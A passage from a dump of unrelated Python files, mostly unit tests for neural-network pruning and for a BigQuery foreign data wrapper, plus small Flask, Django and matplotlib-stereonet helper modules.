            output_feature_map_spatial_size = [112, 112, 112, 56, 56, 56, 56, 28, 28, 28, 28, 14, 14,
                                               14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 7, 7, 7, 7, 1]
            if not only_num_channels:
                self.assertEqual(layer_properties[KEY_INPUT_FEATURE_MAP_SIZE],
                                 [1, input_channels[layer_idx], input_feature_map_spatial_size[layer_idx],
                                  input_feature_map_spatial_size[layer_idx]],
                                 "network_def input feature map size error")
                self.assertEqual(layer_properties[KEY_OUTPUT_FEATURE_MAP_SIZE],
                                 [1, output_channels[layer_idx], output_feature_map_spatial_size[layer_idx],
                                  output_feature_map_spatial_size[layer_idx]],
                                 "network_def output feature map size error")
            # print(layer_idx)
            layer_idx += 1

    def gen_layer_weight(self, tensor):
        gen_tensor = torch.zeros_like(tensor)
        for i in range(gen_tensor.shape[0]):
            gen_tensor[i, ::] += i
        return gen_tensor

    def test_network_def(self):
        network_def = network_utils.get_network_def_from_model(model)
        # print(network_def)
        # print(len(network_def))
        input_channels = [3, 32, 32, 64, 64, 128, 128, 128, 128, 256, 256, 256, 256, 512, 512, 512,
                          512, 512, 512, 512, 512, 512, 512, 512, 512, 1024, 1024, 1024]
        output_channels = [32, 32, 64, 64, 128, 128, 128, 128, 256, 256, 256, 256, 512, 512, 512, 512,
                           512, 512, 512, 512, 512, 512, 512, 512, 1024, 1024, 1024, 10]
        self.check_network_def(network_def, input_channels, output_channels)
        self.assertEqual(network_utils.get_num_simplifiable_blocks(), 14, "Num of simplifiable blocks error")

    def test_compute_resource(self):
        network_def = network_utils.get_network_def_from_model(model)
        num_w = network_utils.compute_resource(network_def, 'WEIGHTS')
        num_mac = network_utils.compute_resource(network_def, 'FLOPS')
        self.assertEqual(num_w, 3195328, "Num of weights error")
        self.assertEqual(num_mac, 567726592, "Num of MACs error")

    def test_extra_history_info(self):
        network_def = network_utils.get_network_def_from_model(model)
        output_feature_info = network_utils.extra_history_info(network_def)
        output_channels = [32, 32, 64, 64, 128, 128, 128, 128, 256, 256, 256, 256, 512, 512, 512, 512,
                           512, 512, 512, 512, 512, 512, 512, 512, 1024, 1024, 1024, 10]
        output_channels_str = [str(x) for x in output_channels]
        output_feature_info_gt = ' '.join(output_channels_str)
        self.assertEqual(output_feature_info, output_feature_info_gt, "extra_history_info error")

    def delta_to_layer_num_channels(self, delta, simp_block_idx):
        input_channels_gt = [3, 32, 32, 64, 64, 128, 128, 128, 128, 256, 256, 256, 256, 512, 512, 512,
                             512, 512, 512, 512, 512, 512, 512, 512, 512, 1024, 1024, 1024]
        output_channels_gt = [32, 32, 64, 64, 128, 128, 128, 128, 256, 256, 256, 256, 512, 512, 512, 512,
                              512, 512, 512, 512, 512, 512, 512, 512, 1024, 1024, 1024, 10]
        if simp_block_idx == 0:
            input_channels_gt[simp_block_idx + 1] = input_channels_gt[simp_block_idx + 1] - delta
            input_channels_gt[simp_block_idx + 2] = input_channels_gt[simp_block_idx + 2] - delta
            output_channels_gt[simp_block_idx] = output_channels_gt[simp_block_idx] - delta
            output_channels_gt[simp_block_idx + 1] = output_channels_gt[simp_block_idx + 1] - delta
        elif simp_block_idx != 13:
            print(input_channels_gt)
            print(output_channels_gt)
            input_channels_gt[2*simp_block_idx + 1] = input_channels_gt[2*simp_block_idx + 1] - delta
            input_channels_gt[2*simp_block_idx + 2] = input_channels_gt[2*simp_block_idx + 2] - delta
            output_channels_gt[2*simp_block_idx] = output_channels_gt[2*simp_block_idx] - delta
            output_channels_gt[2*simp_block_idx + 1] = output_channels_gt[2*simp_block_idx + 1] - delta
        else:
            output_channels_gt[2*simp_block_idx] = output_channels_gt[2*simp_block_idx] - delta
            input_channels_gt[2*simp_block_idx + 1] = input_channels_gt[2*simp_block_idx + 1] - delta
        return input_channels_gt, output_channels_gt

    def run_simplify_network_def_and_check_for_one_resource_type(self, constraint, resource_type,
                                                                 simp_block_indices, delta, res_gt):
        network_def = network_utils.get_network_def_from_model(model)
        for i in range(len(simp_block_indices)):
            simp_block_idx = simp_block_indices[i]
            simp_network_def, simp_resource = network_utils.simplify_network_def_based_on_constraint(
                network_def, simp_block_idx, constraint, resource_type)
            self.assertEqual(simp_resource, res_gt[i],
                             "Simplified network resource {} error".format(resource_type))
            input_channels_gt, output_channels_gt = self.delta_to_layer_num_channels(delta[i], simp_block_idx)
            self.check_network_def(simp_network_def, input_channels_gt, output_channels_gt,
                                   only_num_channels=True)

    def test_simplify_network_def_based_on_constraint(self):
        total_num_w = 3195328
        total_num_mac = 567726592
        constraint_num_w = total_num_w*0.975
        constraint_num_mac = total_num_mac*0.975
        simp_block_indices = [0, 1, 5, 7, 9, 11, 13]
        delta_w = [24, 56, 104, 80, 80, 56, 80]
        delta_mac = [16, 24, 48, 72, 72, 96, 288]
        num_w_gt = [3192928, 3185864, 3114520, 3112688, 3112688, 3108808, 3112608]
        num_mac_gt = [547656192, 547781632, 553191232, 553148896, 553148896, 553233568, 553273024]
        self.run_simplify_network_def_and_check_for_one_resource_type(constraint=constraint_num_w,
                                                                      resource_type="WEIGHTS",
                                                                      simp_block_indices=simp_block_indices,
                                                                      delta=delta_w,
                                                                      res_gt=num_w_gt)
        self.run_simplify_network_def_and_check_for_one_resource_type(constraint=constraint_num_mac,
                                                                      resource_type="FLOPS",
                                                                      simp_block_indices=simp_block_indices,
                                                                      delta=delta_mac,
                                                                      res_gt=num_mac_gt)

    def test_simplify_model_based_on_network_def(self):
        network_def = network_utils.get_network_def_from_model(model)
        total_num_w = 3195328
        constraint_num_w = total_num_w*0.975
        simp_block_indices = [0, 1, 5, 7, 9, 11, 13]
        delta_w = [24, 56, 104, 80, 80, 56, 80]
        topk_w = [8, 8, 152, 432, 432, 456, 944]

        for i in range(len(simp_block_indices)):
            simp_block_idx = simp_block_indices[i]
            simp_network_def, _ = network_utils.simplify_network_def_based_on_constraint(
                network_def, simp_block_idx, constraint_num_w, "WEIGHTS")
            simp_model = network_utils.simplify_model_based_on_network_def(simp_network_def, model)
            updated_network_def = network_utils.get_network_def_from_model(simp_model)
            input_channels_gt, output_channels_gt = self.delta_to_layer_num_channels(delta_w[i], simp_block_idx)
            self.check_network_def(updated_network_def, input_channels_gt, output_channels_gt)

            conv_layers = getattr(model, 'model')
            simp_conv_layers = getattr(simp_model, 'model')
            for block_idx in range(14):
                module = getattr(conv_layers, str(block_idx))
                simp_module = getattr(simp_conv_layers, str(block_idx))
                if block_idx != simp_block_idx and block_idx != simp_block_idx + 1:
                    if block_idx != 0:
                        for layer_idx in ['0', '1', '3', '4']:
                            layer = getattr(module, layer_idx)
                            simp_layer = getattr(simp_module, layer_idx)
                            if layer_idx in ['0', '3']:
                                equal = (simp_layer.weight.data == layer.weight.data)
                                self.assertTrue(equal.min(),
                                                "simplify_model_based_on_network_def modify unrelated conv layers")
                            else:
                                equal_weight = (simp_layer.weight.data == layer.weight.data)
                                equal_bias = (simp_layer.bias.data == layer.bias.data)
                                equal_num_features = (simp_layer.num_features == layer.num_features)
                                self.assertTrue(equal_weight.min(),
                                                "simplify_model_based_on_network_def modify unrelated batchnorm layers (weight)")
                                self.assertTrue(equal_bias.min(),
                                                "simplify_model_based_on_network_def modify unrelated batchnorm layers (bias)")
                                self.assertTrue(equal_num_features,
                                                "simplify_model_based_on_network_def modify unrelated batchnorm layers (num_features)")
                    else:
                        layer = getattr(module, '0')
                        simp_layer = getattr(simp_module, '0')
                        equal = (simp_layer.weight.data == layer.weight.data)
                        self.assertTrue(equal.min(),
                                        "simplify_model_based_on_network_def modify unrelated conv layers")
                        layer = getattr(module, '1')
                        simp_layer = getattr(simp_module, '1')
                        equal_weight = (simp_layer.weight.data == layer.weight.data)
                        equal_bias = (simp_layer.bias.data == layer.bias.data)
                        equal_num_features = (simp_layer.num_features == layer.num_features)
                        self.assertTrue(equal_weight.min(),
                                        "simplify_model_based_on_network_def modify unrelated batchnorm layers (weight)")
                        self.assertTrue(equal_bias.min(),
                                        "simplify_model_based_on_network_def modify unrelated batchnorm layers (bias)")
                        self.assertTrue(equal_num_features,
                                        "simplify_model_based_on_network_def modify unrelated batchnorm layers (num_features)")
                elif block_idx == simp_block_idx:
                    # check (regular/pointwise layer output channels and input channels of the next depthwise layer)
                    # or check (pointwise layer output channels and input features of the next FC layer)
                    if block_idx == 0:
                        layer = getattr(module, '0')
                        simp_layer = getattr(simp_module, '0')
                    else:
                        # pointwise
                        # first check depthwise layer within the same block
                        layer = getattr(module, '0')
                        simp_layer = getattr(simp_module, '0')
                        equal_dep = (layer.weight.data == simp_layer.weight.data)
                        self.assertTrue(equal_dep.min(), "Depthwise layer within the target block error")
                        layer = getattr(module, '3')
                        simp_layer = getattr(simp_module, '3')
                    layer_weight = layer.weight.data
                    weight_vector = layer_weight.view(layer_weight.shape[0], -1)
                    weight_norm = weight_vector*weight_vector
                    weight_norm = torch.sum(weight_norm, dim=1)
                    _, kept_filter_idx = torch.topk(weight_norm, topk_w[i], sorted=False)
                    kept_filter_idx, _ = kept_filter_idx.sort()
                    weight_gt = layer_weight[kept_filter_idx, :, :, :]
                    weight_simp = simp_layer.weight.data
                    equal_weight = (weight_gt == weight_simp)
                    self.assertTrue(equal_weight.min(), "Output channels of the pruned layer error")

                    # modify input channels of the next few layers
                    if block_idx != 13:
                        # depthwise -> batchnorm -> pointwise
                        next_module = getattr(conv_layers, str(block_idx + 1))
                        simp_next_module = getattr(simp_conv_layers, str(block_idx + 1))
                        dep_layer = getattr(next_module, '0')
                        simp_dep_layer = getattr(simp_next_module, '0')
                        dep_layer_weight = dep_layer.weight.data[kept_filter_idx, :, :, :]
                        equal_dep_weights = (dep_layer_weight == simp_dep_layer.weight.data)
                        self.assertTrue(equal_dep_weights.min(),
                                        "Input channels of the depthwise layer after pruned layers error")
                        batchnorm_layer = getattr(next_module, '1')
                        simp_batchnorm_layer = getattr(simp_next_module, '1')
                        batchnorm_layer_weight = batchnorm_layer.weight.data[kept_filter_idx]
                        equal_batchnorm_weights = (batchnorm_layer_weight == simp_batchnorm_layer.weight.data)
                        self.assertTrue(equal_batchnorm_weights.min(),
                                        "Weights of the batchnorm layer after pruned layers error")
                        batchnorm_layer_bias = batchnorm_layer.bias.data[kept_filter_idx]
                        equal_batchnorm_bias = (batchnorm_layer_bias == simp_batchnorm_layer.bias.data)
                        self.assertTrue(equal_batchnorm_bias.min(),
                                        "Biases of the batchnorm layer after pruned layers error")
                        equal_batchnorm_num_features = (len(kept_filter_idx) == simp_batchnorm_layer.num_features)
                        self.assertTrue(equal_batchnorm_num_features,
                                        "Number of features of the batchnorm layer after pruned layers error")
                        pt_layer = getattr(next_module, '3')
                        simp_pt_layer = getattr(simp_next_module, '3')
                        pt_layer_weight = pt_layer.weight.data[:, kept_filter_idx, :, :]
                        equal_pt_weights = (pt_layer_weight == simp_pt_layer.weight.data)
                        self.assertTrue(equal_pt_weights.min(),
                                        "Input channels of the pointwise layer after pruned layers error")
                    else:
                        # FC
                        fc_layer = getattr(model, 'fc')
                        simp_fc_layer = getattr(simp_model, 'fc')
                        fc_layer_weight = fc_layer.weight.data
                        fc_layer_weight = fc_layer_weight[:, kept_filter_idx]
                        equal_fc_weights = (fc_layer_weight == simp_fc_layer.weight.data)
                        self.assertTrue(equal_fc_weights.min(), "Input features of FC layer error")

    def test_simplify_model_based_on_network_def_check_weights(self):
        # make sure we prune the correct filters by checking the weights of a pruned model
        # the weights of the original model are initialized to certain values
        total_num_w = 3195328
        constraint_num_w = total_num_w*0.975
        simp_block_indices = [0, 1, 5, 7, 9, 11, 13]
        delta_w = [24, 56, 104, 80, 80, 56, 80]
        topk_w = [8, 8, 152, 432, 432, 456, 944]

        # initialize model weights
        model_init = copy.deepcopy(model)
        conv_layers = getattr(model_init, 'model')
        for block_idx in range(14):
            module = getattr(conv_layers, str(block_idx))
            # regular/depthwise
            layer = getattr(module, '0')
            layer.weight.data = self.gen_layer_weight(layer.weight.data)
            if block_idx != 0:
                # pointwise
                layer = getattr(module, '3')
                layer.weight.data = self.gen_layer_weight(layer.weight.data)
        model_init.fc.weight.data = self.gen_layer_weight(model_init.fc.weight.data)

        network_def = network_utils.get_network_def_from_model(model_init)
        for i in range(len(simp_block_indices)):
            simp_block_idx = simp_block_indices[i]
            simp_network_def, _ = network_utils.simplify_network_def_based_on_constraint(
                network_def, simp_block_idx, constraint_num_w, "WEIGHTS")
            simp_model = network_utils.simplify_model_based_on_network_def(simp_network_def, model_init)
            updated_network_def = network_utils.get_network_def_from_model(simp_model)
            input_channels_gt, output_channels_gt = self.delta_to_layer_num_channels(delta_w[i], simp_block_idx)
            self.check_network_def(updated_network_def, input_channels_gt, output_channels_gt)

            simp_conv_layers = getattr(simp_model, 'model')
            for block_idx in range(14):
                if block_idx == simp_block_idx:
                    simp_module = getattr(simp_conv_layers, str(block_idx))
                    if block_idx == 0:
                        simp_layer = getattr(simp_module, '0')
                    else:
                        # pointwise
                        simp_layer = getattr(simp_module, '3')
                    for weight_idx in range(topk_w[i]):
                        equal_weights = (simp_layer.weight.data[weight_idx, ::] == delta_w[i] + weight_idx)
                        self.assertTrue(equal_weights.min(), "Weights of the pruned layers error")
                    if simp_block_idx != 13:
                        # check the next depthwise layer
                        simp_module = getattr(simp_conv_layers, str(block_idx + 1))
                        simp_layer = getattr(simp_module, '0')
                        for weight_idx in range(topk_w[i]):
                            equal_weights = (simp_layer.weight.data[weight_idx, ::] == delta_w[i] + weight_idx)
                            self.assertTrue(equal_weights.min(), "Weights of the pruned layers error")

    def test_build_latency_lookup_table(self):
        network_def = network_utils.get_network_def_from_model(model)
        lookup_table_path = './unittest_lookup_table.pkl'
        min_conv_feature_size = 32
        min_fc_feature_size = 128
        measure_latency_batch_size = 1
        measure_latency_sample_times = 1
        network_utils.build_lookup_table(network_def, 'LATENCY', lookup_table_path,
                                         min_conv_feature_size, min_fc_feature_size,
                                         measure_latency_batch_size, measure_latency_sample_times)
        with open(lookup_table_path, 'rb') as file_id:
            lookup_table = pickle.load(file_id)
        self.assertEqual(len(lookup_table), 28, "Lookup table length error")

        input_channels_gt = [3, 32, 32, 64, 64, 128, 128, 128, 128, 256, 256, 256, 256, 512, 512, 512,
                             512, 512, 512, 512, 512, 512, 512, 512, 512, 1024, 1024, 1024]
        output_channels_gt = [32, 32, 64, 64, 128, 128, 128, 128, 256, 256, 256, 256, 512, 512, 512, 512,
                              512, 512, 512, 512, 512, 512, 512, 512, 1024, 1024, 1024, 10]
        layer_idx = 0
        dep_layer_latency_dict_list = []
        pt_layer_latency_dict_list = []
        for layer_name, layer_properties in lookup_table.items():
            self.assertEqual(layer_properties[KEY_IS_DEPTHWISE], network_def[layer_name][KEY_IS_DEPTHWISE],
                             "lookup table layer properties error (is_depthwise)")
            self.assertEqual(layer_properties[KEY_NUM_IN_CHANNELS], network_def[layer_name][KEY_NUM_IN_CHANNELS],
                             "lookup table layer properties error (num_in_channels)")
            self.assertEqual(layer_properties[KEY_NUM_OUT_CHANNELS], network_def[layer_name][KEY_NUM_OUT_CHANNELS],
                             "lookup table layer properties error (num_out_channels)")
            self.assertEqual(layer_properties[KEY_KERNEL_SIZE], network_def[layer_name][KEY_KERNEL_SIZE],
                             "lookup table layer properties error (kernel_size)")
            self.assertEqual(layer_properties[KEY_STRIDE], network_def[layer_name][KEY_STRIDE],
                             "lookup table layer properties error (stride)")
            self.assertEqual(layer_properties[KEY_PADDING], network_def[layer_name][KEY_PADDING],
                             "lookup table layer properties error (padding)")
            self.assertEqual(layer_properties[KEY_GROUPS], network_def[layer_name][KEY_GROUPS],
                             "lookup table layer properties error (groups)")
            self.assertEqual(layer_properties[KEY_LAYER_TYPE_STR], network_def[layer_name][KEY_LAYER_TYPE_STR],
                             "lookup table layer properties error (layer_type_str)")
            self.assertEqual(layer_properties[KEY_INPUT_FEATURE_MAP_SIZE],
                             network_def[layer_name][KEY_INPUT_FEATURE_MAP_SIZE],
                             "lookup table layer properties error (input_feature_size)")

            layer_latency_table = layer_properties[KEY_LATENCY]
            num_in_samples = input_channels_gt[layer_idx]
            num_output_samples = output_channels_gt[layer_idx]
            if layer_idx != 27:
                if num_in_samples < min_conv_feature_size:
                    num_in_samples = 1
                else:
                    num_in_samples = num_in_samples/min_conv_feature_size
                num_output_samples = num_output_samples/min_conv_feature_size
            else:
                num_in_samples = num_in_samples/min_fc_feature_size
                if num_output_samples < min_fc_feature_size:
                    num_output_samples = 1
            if layer_idx != 27 and layer_idx % 2 == 1:
                self.assertEqual(len(layer_latency_table), num_in_samples,
                                 "Layerwise latency dict length error (layer index: {})".format(layer_idx))
            else:
                self.assertEqual(len(layer_latency_table), num_in_samples*num_output_samples,
                                 "Layerwise latency dict length error (layer index: {})".format(layer_idx))

            if layer_idx >= 13 and layer_idx <= 22:
                if layer_idx % 2 == 0:
                    # pointwise layer
                    pt_layer_latency_dict_list.append(layer_latency_table)
                else:
                    # depthwise layer
                    dep_layer_latency_dict_list.append(layer_latency_table)
            layer_idx += 1

        # check whether same layers have the same results
        for i in range(1, len(dep_layer_latency_dict_list)):
            latency_dict_gt = dep_layer_latency_dict_list[0]
            latency_dict = dep_layer_latency_dict_list[i]
            for key, value in latency_dict_gt.items():
                self.assertEqual(latency_dict_gt[key], latency_dict[key],
                                 "Lookup table of same depthwise layers ({}) error".format(i))
        for i in range(1, len(pt_layer_latency_dict_list)):
            latency_dict_gt = pt_layer_latency_dict_list[0]
            latency_dict = pt_layer_latency_dict_list[i]
            for key, value in latency_dict_gt.items():
                self.assertEqual(latency_dict_gt[key], latency_dict[key],
                                 "Lookup table of same pointwise layers ({}) error".format(i))

        os.remove(lookup_table_path)


if __name__ == '__main__':
    unittest.main()
440152
from flask import Flask
from flask_compress import Compress

from serverpanel.ext.serverinfo import ServerInfo

server_info = ServerInfo()
compress = Compress()


def create_app(config):
    app = Flask(__name__)
    app.config.from_object(config)

    server_info.init_app(app)
    compress.init_app(app)

    from serverpanel.controllers import main
    from serverpanel.controllers import api

    app.register_blueprint(main)
    app.register_blueprint(api, url_prefix='/api')

    return app
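
# Illustrative usage (added sketch, not part of the original module). Any object
# whose uppercase attributes Flask understands can serve as `config`; the
# `DevConfig` class below is hypothetical.
if __name__ == '__main__':
    class DevConfig:
        DEBUG = True

    create_app(DevConfig).run()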
440179
import os
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
import torch
import torchvision
import torchvision.transforms as transforms
import torch.nn as nn
import torch.nn.functional as F
import copy
import random
# https://github.com/facebookresearch/higher imported on Dec 2020
import higher
import pickle
440232
import sys, os


def get_parent_path(level=1):
    """Walk up the directory tree from this file's absolute path.

    Note the off-by-one semantics of the loop below: with the default
    ``level=1`` this returns the absolute path of this file itself;
    ``level=2`` returns the directory containing it, and each additional
    level strips one more path component.
    """
    bundle_dir = os.path.abspath(__file__)
    for i in range(1, level):
        bundle_dir = os.path.dirname(bundle_dir)
    return bundle_dir
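
# Illustrative usage (added sketch): resolving paths relative to this file,
# following the semantics documented in the docstring above.
if __name__ == '__main__':
    print(get_parent_path(2))  # directory containing this file
    print(get_parent_path(3))  # its parent directory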
440269
from django.contrib import admin
from django.db.models import Model
from django.template.defaultfilters import pluralize

from djedi.admin import cms


def register(admin_class):
    name = admin_class.verbose_name
    name_plural = getattr(admin_class, 'verbose_name_plural', pluralize(name))

    # Build a throwaway abstract model so the admin class can be registered
    # under the 'djedi' app without a real database table.
    model = type(name, (Model,), {
        '__module__': __name__,
        'Meta': type('Meta', (object,), dict(
            managed=False,
            abstract=True,
            app_label='djedi',
            verbose_name=name,
            verbose_name_plural=name_plural
        ))
    })

    admin.site._registry[model] = admin_class(model, admin.site)


register(cms.Admin)
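
# Illustrative usage (added sketch): `register` expects an admin class exposing
# `verbose_name` (and optionally `verbose_name_plural`); the `PagesAdmin` class
# below is hypothetical.
#
#     class PagesAdmin(admin.ModelAdmin):
#         verbose_name = 'Pages'
#
#     register(PagesAdmin)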
440278
def subplots(nrows=1, ncols=1, sharex=False, sharey=False, squeeze=True,
             subplot_kw=None, hemisphere='lower', projection='equal_area',
             **fig_kw):
    """
    Identical to matplotlib.pyplot.subplots, except that this will default
    to producing equal-area stereonet axes.

    This prevents constantly doing:

        >>> fig, ax = plt.subplots(subplot_kw=dict(projection='stereonet'))

    or

        >>> fig = plt.figure()
        >>> ax = fig.add_subplot(111, projection='stereonet')

    Using this function also avoids having ``mplstereonet`` continually
    appear to be an unused import when one of the above methods are used.

    Parameters
    ----------
    nrows : int
        Number of rows of the subplot grid. Defaults to 1.
    ncols : int
        Number of columns of the subplot grid. Defaults to 1.
    hemisphere : string
        Currently this has no effect. When upper hemisphere and dual
        hemisphere plots are implemented, this will control which
        hemisphere is displayed.
    projection : string
        The projection for the axes. Defaults to 'equal_area', an
        equal-area (a.k.a. "Schmidt") stereonet. May also be 'equal_angle'
        for an equal-angle (a.k.a. "Wulff") stereonet or any other valid
        matplotlib projection (e.g. 'polar' or 'rectilinear' for a
        "normal" axes).

    The following parameters are identical to matplotlib.pyplot.subplots:

    sharex : string or bool
        If *True*, the X axis will be shared amongst all subplots. If
        *True* and you have multiple rows, the x tick labels on all but
        the last row of plots will have visible set to *False*.
        If a string, must be one of "row", "col", "all", or "none". "all"
        has the same effect as *True*, "none" has the same effect as
        *False*. If "row", each subplot row will share a X axis. If "col",
        each subplot column will share a X axis and the x tick labels on
        all but the last row will have visible set to *False*.
    sharey : string or bool
        If *True*, the Y axis will be shared amongst all subplots. If
        *True* and you have multiple columns, the y tick labels on all but
        the first column of plots will have visible set to *False*.
        If a string, must be one of "row", "col", "all", or "none". "all"
        has the same effect as *True*, "none" has the same effect as
        *False*. If "row", each subplot row will share a Y axis. If "col",
        each subplot column will share a Y axis and the y tick labels on
        all but the last row will have visible set to *False*.
    squeeze : bool
        If *True*, extra dimensions are squeezed out from the returned
        axis object:

        - if only one subplot is constructed (nrows=ncols=1), the
          resulting single Axis object is returned as a scalar.
        - for Nx1 or 1xN subplots, the returned object is a 1-d numpy
          object array of Axis objects.
        - NxM subplots with N>1 and M>1 are returned as a 2-d array.

        If *False*, no squeezing at all is done: the returned axis object
        is always a 2-d array containing Axis instances, even if it ends
        up being 1x1.
    subplot_kw : dict
        Dict with keywords passed to the
        :meth:`~matplotlib.figure.Figure.add_subplot` call used to create
        each subplot.
    fig_kw : dict
        Dict with keywords passed to the :func:`figure` call. Note that
        all keywords not recognized above will be automatically included
        here.

    Returns
    -------
    fig, ax : tuple

    - *fig* is the :class:`matplotlib.figure.Figure` object
    - *ax* can be either a single axis object or an array of axis objects
      if more than one subplot was created. The dimensions of the
      resulting array can be controlled with the squeeze keyword, see
      above.
    """
    import matplotlib.pyplot as plt
    if projection in ['equal_area', 'equal_angle']:
        projection += '_stereonet'
    if subplot_kw is None:
        subplot_kw = {}
    subplot_kw['projection'] = projection
    return plt.subplots(nrows, ncols, sharex=sharex, sharey=sharey,
                        squeeze=squeeze, subplot_kw=subplot_kw, **fig_kw)
440303
import unittest
from unittest.mock import patch
from collections import OrderedDict
import datetime
import os

import multicorn
from google.cloud import bigquery

from ..bqclient import BqClient
from ..fdw import ConstantForeignDataWrapper


class Test(unittest.TestCase):

    def setUp(self):
        # Set options
        self.options = {
            'fdw_dataset': 'bigquery-public-data.usa_names',
            'fdw_table': 'usa_1910_current',
            'fdw_verbose': 'true',
            'fdw_sql_dialect': 'standard',
            'fdw_group': 'false',
            'fdw_casting': 'false',
        }

        # Set column list (ordered dict of ColumnDefinition from Multicorn)
        self.columns = OrderedDict([
            ('state', multicorn.ColumnDefinition(
                column_name='state', type_oid=25, base_type_name='text')),
            ('gender', multicorn.ColumnDefinition(
                column_name='gender', type_oid=25, base_type_name='text')),
            ('year', multicorn.ColumnDefinition(
                column_name='year', type_oid=20, base_type_name='bigint')),
            ('name', multicorn.ColumnDefinition(
                column_name='name', type_oid=25, base_type_name='text')),
            ('number', multicorn.ColumnDefinition(
                column_name='number', type_oid=20, base_type_name='bigint'))
        ])

        # Define Quals as defined by Multicorn
        self.quals = [
            multicorn.Qual(field_name='number', operator='>', value=1000),
            multicorn.Qual(field_name='year', operator='=', value=2017),
        ]

        # Set instance of ConstantForeignDataWrapper
        self.fdw = ConstantForeignDataWrapper(self.options, self.columns)

    def test_setOptions(self):
        self.assertIsNone(self.fdw.setOptions(self.options))

    def test_setOptions_2(self):
        # Should create a `KeyError` exception which should call log_to_postgres()
        o = self.options
        del o['fdw_dataset']
        self.assertIsNone(self.fdw.setOptions(o))

    def test_setDatatypes(self):
        self.fdw.setDatatypes()
        self.assertIsInstance(self.fdw.datatypes, list)
        for datatype in self.fdw.datatypes:
            self.assertIsInstance(datatype, tuple)
            self.assertIsInstance(datatype.postgres, str)
            self.assertIsInstance(datatype.bq_standard, str)
            self.assertIsInstance(datatype.bq_legacy, str)

    def test_setConversionRules(self):
        self.fdw.setConversionRules()
        self.assertIsInstance(self.fdw.conversionRules, list)
        for conversionRule in self.fdw.conversionRules:
            self.assertIsInstance(conversionRule, tuple)
            self.assertIsInstance(conversionRule.bq_standard_from, str)
            self.assertIsInstance(conversionRule.bq_standard_to, list)

    def test_setOptionSqlDialect(self):
        self.fdw.setOptionSqlDialect()
        self.assertEqual(self.fdw.dialect, 'standard')

    def test_setOptionSqlDialect_2(self):
        self.fdw.setOptionSqlDialect('legacy')
        self.assertEqual(self.fdw.dialect, 'legacy')

    def test_setOptionSqlDialect_3(self):
        self.fdw.setOptionSqlDialect('non_existent')
        # Should fall back to `standard`
        self.assertEqual(self.fdw.dialect, 'standard')

    def test_setOptionSqlDialect_4(self):
        self.fdw.verbose = False
        self.fdw.setOptionSqlDialect()
        self.assertEqual(self.fdw.dialect, 'standard')

    def test_setOptionGroupBy(self):
        self.fdw.setOptionGroupBy('true')
        self.assertTrue(self.fdw.groupBy)

    def test_setOptionGroupBy_2(self):
        self.fdw.setOptionGroupBy('false')
        self.assertFalse(self.fdw.groupBy)

    def test_setOptionVerbose(self):
        self.fdw.setOptionVerbose('true')
        self.assertTrue(self.fdw.verbose)

    def test_setOptionVerbose_2(self):
        self.fdw.setOptionVerbose('false')
        self.assertFalse(self.fdw.verbose)

    def test_setOptionCasting(self):
        # Options are a dict casted as a string
        casting = '{"column1": "STRING", "column2": "DATE", "column3": "TIMESTAMP"}'
        self.fdw.setOptionCasting(casting)
        self.assertIsInstance(self.fdw.castingRules, dict)
        for column, cast in self.fdw.castingRules.items():
            self.assertTrue(column in ['column1', 'column2', 'column3'])
            self.assertTrue(cast in ['STRING', 'DATE', 'TIMESTAMP'])

    def test_setOptionCasting_2(self):
        # Nothing should happen if no casting options have been set
        casting = ''
        self.assertIsNone(self.fdw.setOptionCasting(casting))

    def test_getClient(self):
        self.fdw.setClient()
        self.assertIsInstance(self.fdw.getClient(), BqClient)

    def test_getClient_2(self):
        self.fdw.verbose = False
        self.fdw.setClient()
        self.assertIsInstance(self.fdw.getClient(), BqClient)

    def test_setClient(self):
        self.assertIsInstance(self.fdw.setClient(), BqClient)

    def test_setClient_2(self):
        self.fdw.verbose = False
        self.assertIsInstance(self.fdw.setClient(), BqClient)

    def test_setClient_3(self):
        # Should return `None` and call log_to_postgres() if the BigQuery client cannot be set correctly
        with patch.dict(os.environ, {'GOOGLE_APPLICATION_CREDENTIALS': ''}):
            self.assertIsNone(self.fdw.setClient())

    def test_execute(self):
        self.fdw.setClient()
        execute = self.fdw.execute(self.quals, self.columns.keys())
        for row in execute:
            # Ensure that the row is an OrderedDict
            self.assertIsInstance(row, OrderedDict)
            # Compare the keys of each row with the expected columns
            self.assertEqual(set(row.keys()), set(
                {'state', 'gender', 'year', 'name', 'number'}))

    def test_buildQuery(self):
        self.fdw.bq = self.fdw.getClient()
        query, parameters = self.fdw.buildQuery(self.quals, self.columns)
        self.assertIsInstance(query, str)
        self.assertIsInstance(parameters, list)
        for parameter in parameters:
            self.assertIsInstance(
                parameter, bigquery.query.ScalarQueryParameter)

    def test_buildQuery_2(self):
        self.fdw.verbose = False
        self.fdw.bq = self.fdw.getClient()
        query, parameters = self.fdw.buildQuery(self.quals, self.columns)
        self.assertIsInstance(query, str)
        self.assertIsInstance(parameters, list)
        for parameter in parameters:
            self.assertIsInstance(
                parameter, bigquery.query.ScalarQueryParameter)

    def test_buildQuery_3(self):
        # Test with grouping option
        self.fdw.groupBy = True
        self.fdw.bq = self.fdw.getClient()
        query, parameters = self.fdw.buildQuery(self.quals, self.columns)
        self.assertIsInstance(query, str)
        self.assertIsInstance(parameters, list)
        for parameter in parameters:
            self.assertIsInstance(
                parameter, bigquery.query.ScalarQueryParameter)

    def test_buildQuery_4(self):
        # Test with grouping option but no columns sent to buildQuery()
        self.fdw.groupBy = True
        self.fdw.bq = self.fdw.getClient()
        query, parameters = self.fdw.buildQuery(self.quals, None)
        self.assertIsInstance(query, str)
        self.assertIsInstance(parameters, list)
        for parameter in parameters:
            self.assertIsInstance(
                parameter, bigquery.query.ScalarQueryParameter)

    def test_buildColumnList(self):
        self.assertEqual(self.fdw.buildColumnList(self.columns),
                         'state as state, gender as gender, year as year, name as name, number as number')

    def test_buildColumnList_2(self):
        self.assertEqual(self.fdw.buildColumnList(self.columns, 'GROUP_BY'),
                         'state , gender , year , name , number')

    def test_buildColumnList_3(self):
        # Test with counting pseudo column
        c = self.columns
        c['_fdw_count'] = multicorn.ColumnDefinition(
            column_name='_fdw_count', type_oid=20, base_type_name='bigint')
        self.assertEqual(self.fdw.buildColumnList(c),
                         'state as state, gender as gender, year as year, name as name, number as number, count(*) as _fdw_count')

    def test_buildColumnList_4(self):
        # Test with counting pseudo column
        c = self.columns
        c['_fdw_count'] = multicorn.ColumnDefinition(
            column_name='_fdw_count', type_oid=20, base_type_name='bigint')
        self.assertEqual(self.fdw.buildColumnList(c, 'GROUP_BY'), 'state
